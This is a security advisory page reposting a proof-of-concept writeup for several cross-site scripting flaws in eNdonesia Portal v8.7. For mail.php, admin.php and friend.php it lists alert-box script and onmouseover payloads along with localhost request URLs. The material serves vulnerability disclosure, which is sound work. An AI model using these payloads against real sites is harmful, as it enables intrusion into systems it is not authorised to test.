eNdonesia Portal Multiple XSS Inj.

2019.04.15
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=========================================================================================== # Exploit Title: eNdonesia Portal 'mail.php' XSS Inj. # Dork: N/A # Date: 19-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.endonesia.org/ # Software Link: https://sourceforge.net/projects/endonesia/ # Version: v8.7 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: eNdonesia ia a portal software, content management system (CMS) site management system , online publishing system, or whatever you want to name it. For internet, intranet, or on your own PC. =========================================================================================== # POC - XSS # Parameters : mail.php # Attack Pattern : /'"--></style></scRipt><scRipt>alert(0x001D13)</scRipt> # GET Method : http://localhost/endonesia87/mail.php/'"--></style></scRipt><scRipt>alert(0x001D13)</scRipt> =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: eNdonesia Portal 'admin.php' XSS Inj. # Dork: N/A # Date: 19-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.endonesia.org/ # Software Link: https://sourceforge.net/projects/endonesia/ # Version: v8.7 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: eNdonesia ia a portal software, content management system (CMS) site management system , online publishing system, or whatever you want to name it. For internet, intranet, or on your own PC. =========================================================================================== # POC - XSS # Parameters : admin.php # Attack Pattern : %3cscRipt%3ealert(0x001FD3)%3c%2fscRipt%3e # GET Method : http://localhost/endonesia87/admin.php?op=BannerDelete&bid=<scRipt>alert(0x001FD3)</scRipt>&ok=3 =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: eNdonesia Portal 'friend.php' XSS Inj. # Dork: N/A # Date: 19-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.endonesia.org/ # Software Link: https://sourceforge.net/projects/endonesia/ # Version: v8.7 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: eNdonesia ia a portal software, content management system (CMS) site management system , online publishing system, or whatever you want to name it. For internet, intranet, or on your own PC. =========================================================================================== # POC - XSS # Parameters : friend.php, yname, fname, comments # Attack Pattern : x%22+onmouseover%3dalert(0x0028A5)+x%3d%22 # POST Method : http://localhost/endonesia87/friend.php =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: eNdonesia Portal 'mail.php' XSS Inj. # Dork: N/A # Date: 19-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.endonesia.org/ # Software Link: https://sourceforge.net/projects/endonesia/ # Version: v8.7 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: eNdonesia ia a portal software, content management system (CMS) site management system , online publishing system, or whatever you want to name it. For internet, intranet, or on your own PC. =========================================================================================== # POC - XSS # Parameters : mail.php, name, from, message # Attack Pattern : x%22+onmouseover%3dalert(0x0029D2)+x%3d%22 # POST Method : http://localhost/endonesia87/mail.php ===========================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top